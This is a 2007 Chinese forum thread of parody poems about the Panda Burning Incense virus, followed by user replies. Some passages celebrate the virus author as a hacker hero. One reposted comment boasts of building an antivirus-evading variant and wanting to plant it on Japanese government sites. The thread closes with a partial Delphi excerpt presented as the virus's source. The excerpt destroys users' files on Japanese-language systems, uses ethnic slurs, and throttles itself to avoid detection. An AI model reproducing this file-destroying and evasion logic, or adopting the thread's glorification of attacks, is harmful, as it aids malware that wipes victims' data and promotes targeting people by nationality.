标题: [元首]苦中作乐,熊猫烧香诗集 [打印本页]

作者: wowshell    时间: 2007-1-28 00:59     标题: [元首]苦中作乐,熊猫烧香诗集

熊猫烧香诗歌大接龙,欢迎跟贴卡巴问童子,

熊猫烧香去。

只在主机中,

扫描不知处。

熊猫离家带香回,毒性无改势未衰。 卡巴相见不相识,笑问猫从何处来?

久旱逢熊猫,

它乡遇烧香。

机房杀毒夜,

明早装机时。

一提熊猫泪千行,咋知何日不烧香.

天涯何处无熊猫,何必单恋三枝香。

熊猫未死香不尽,杀毒正扫泪怎干?

路逢熊猫须当避,不是高手莫修机。

只因世上多熊猫,才有人间百毒生。

熊猫一个能毁机,杀毒一堆也关闭。

一年之始头晕晕,

网上诸友欲断魂.

借问何处去‘烧香',

‘熊猫’遥祭你内存.

曾经有一只熊猫摆在我的面前,我没有在意,直到膏肓了我才后悔莫及,人世间最痛苦的事莫过于此.如果上天能给我一次重新的机会,我会对那只熊猫说:老子以后只玩单机游戏,不上网了.如果非要在这句话的后面加上个期限的话,我希望是熊猫被灭的时候... ...

上网不觉晓

忽然死机了

熊猫来烧香

电脑瘫多少

——熊猫,熊猫,快上,进入了,点香,点香!点香!青岛小哥立功了,青岛小哥立功了!不要给电脑机主们任何的机会。

伟大的青岛小哥!他继承了黑客们的光荣的传统。蠕虫、切尔诺贝利、求职信在这一刻灵魂附体,烧香的小熊猫一个人他代表了黑客帝国悠久的历史和传统,在这一刻他不是一个人在战斗,他不是一个人!

小熊猫,面对广大的机主们。你面对着全世界黑客们目光和期待。

机主们曾经 杀掉过两个病毒,熊猫应该深知这一点,他还能够微笑着面对他面前的这个机主吗?10秒钟以后他会是怎样的表情?

瘫痪啦了!比赛结束了!青岛小哥获得了胜利,淘汰了又一个机主。他们没有再一次倒在操作杀毒软件的机主面前,伟大的黑客帝国的左后卫!青岛小哥今天生日快乐!黑客帝国万岁!

这个胜利属于黑客帝国,属于熊猫,属于青岛小哥,属于那三根儿燃烧的香,属于所有热爱黑客运动的人!

没有花香

没有树高

我是一只前来烧香的熊猫

从不寂寞

从不烦脑

你看我的伙伴遍及天涯海角

电脑啊电脑

你把我制造

网络啊网络

你把我传播

主机啊硬盘

你养育了我

exe啊exe

把我紧紧拥抱

题长老燃香 

硬盘格式化,

光棍泪滴答;

熊猫三拜后,

剃度又一茬!

日照熊猫生紫烟

遥看烧香染硬盘

飞流直染三千兆

疑是魔鬼落人间!

锄猫

--现代*放屁砸到脚后跟

熊猫烧香处,

杀毒软件土;

谁知盘中删?

格式很痛苦!

熊猫来烧香

瘟都死光光

举头看屏幕

低头开机箱

熊猫一只又一只,

一二三四五六七。

到处玩耍到处去,

去到硬盘找竹吃。

谁知道,你没有!

惟有硬盘当竹食!

床前明月光,熊猫在烧香   

专杀杀不尽,两眼泪汪汪  

相见时难杀亦难,熊猫烧香百机残。
作者: ヤCity.裳逝.    时间: 2007-1-28 01:02

-0- 偶电脑里专门装了防这个的
作者: 北极星    时间: 2007-1-28 01:07

作为一名学汉语言文学的

未来无限光明的

祖国大好热血青年

你这首诗

不管从

格律 主题  压韵

章回 中心  意境

都让我是

丈二和尚

摸不着头脑啊

看在沙发的面子上

还是

积点口德

善哉  善哉
作者: 海藻~    时间: 2007-1-28 02:04

太多 所以没看
作者: 天堂の泅徒    时间: 2007-1-28 03:22

难道元首被烧了..
作者: a1838210    时间: 2007-1-28 10:47

作者: a1838210    时间: 2007-1-28 10:49

作者: 夏树卡瓦依    时间: 2007-1-28 11:16

当时我看见exe都变成了熊猫还觉得挺好玩的。。。后来--我彻底
ORZ了
作者: 热泪烧伤    时间: 2007-1-28 11:39

VISTA系统不会中这毒的,另外专杀工具不是早有了嘛- -
作者: 天空星Dê回忆    时间: 2007-1-28 12:07

我电脑中了两次,全部格了一次
这辈子没这么恨过熊猫
因为中的比较早,那时还没出专杀
作者: 夏树卡瓦依    时间: 2007-1-28 12:47

变种啊。。。专杀也没有用
作者: uenuen    时间: 2007-1-28 12:59

......我飘过..
作者: 猪P福er    时间: 2007-1-28 13:04

臭丫头.最近干吗呢~~
作者: 与星独白    时间: 2007-1-28 13:13

床前明月光,熊猫在烧香   

专杀杀不尽,两眼泪汪汪  

相见时难杀亦难,熊猫烧香百机残。

haha
作者: uenuen    时间: 2007-1-28 13:13

在烧香
作者: lippi    时间: 2007-1-28 13:27

满城尽烧国宝香~
作者: wowshell    时间: 2007-1-28 13:33

呵呵,我没中过这个病毒
作者: 猪P福er    时间: 2007-1-28 14:35

熊猫烧香..公司电脑中过..我狂笑了一晚上..
作者: 我爱尤那    时间: 2007-1-28 14:39

无知!
你动态跟踪过熊猫没有?
或许你只是道听途说就到处乱喊,
连它有没有加壳你都不知道吧?
看过它的反汇编代码没有?

我看过,我跟踪调试过代码,
里面我敢百分之百的肯定有汇编语言写的,
就是插到被感染的exe程序的那段,
先loadlibrary加载kernel32.dll
再分别获取函数的内存地址,最后才调用这些函数来检测、释放、运行病毒文件和原来的exe文件
其中修改OEP以及获取函数地址的手法明显是用汇编写的,
完全没有delphi生成的那些多余代码
或许很少人发现,其中有一个部件是vb写的

顺便透露一句,我已经成功的做出了熊猫的免杀变种,
最近又用vc6.0仿写了一次,绝对是彻底免杀的,
因为我根本就没发布,杀毒软件也不会认识它

当然,这些只是技术研究,我也不打算发布出去,
如果我能早三年写出来就好了,2004年8月跟日本那次网战,
如果那时手上就有熊猫变种的话我会豪不犹豫的挂在自卫队的网站上,
那时候我们最先搞定的就是自卫队。

我会为日本右翼留着它的。

csdn上看到的
作者: wowshell    时间: 2007-1-28 14:42

又见程序员

04年是疯狂的一年
作者: 我爱尤那    时间: 2007-1-28 14:58

if IsJap then //是倭文操作系统
          begin
            if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
              (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
              (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
              (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
              (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
              (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
                SmashFile(Fn); //摧毁文件
          end;
        end;
      end;
      //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
      Sleep(200);
    until (FindNext(SearchRec) <> 0);
  end;
  FindClose(SearchRec);
  SubDir := TStringList.Create;
  if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
  begin
    repeat
      if IsValidDir(SearchRec) = 1 then
        SubDir.Add(SearchRec.Name);
    until (FindNext(SearchRec) <> 0);
    end;
  FindClose(SearchRec);
  Count := SubDir.Count - 1;
  for i := 0 to Count do
    LoopFiles(Path + SubDir.Strings + '', Mask);
  FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;

var
  DriverList: string;
  i, Len: Integer;
begin
  if GetACP = 932 then //日文操作系统
    IsJap := True; //去死吧!

据说是熊猫烧香中的源代码..

欢迎光临 浆糊论坛-RO小站 (http://bbs.rohome.cn/) Powered by Discuz! 7.2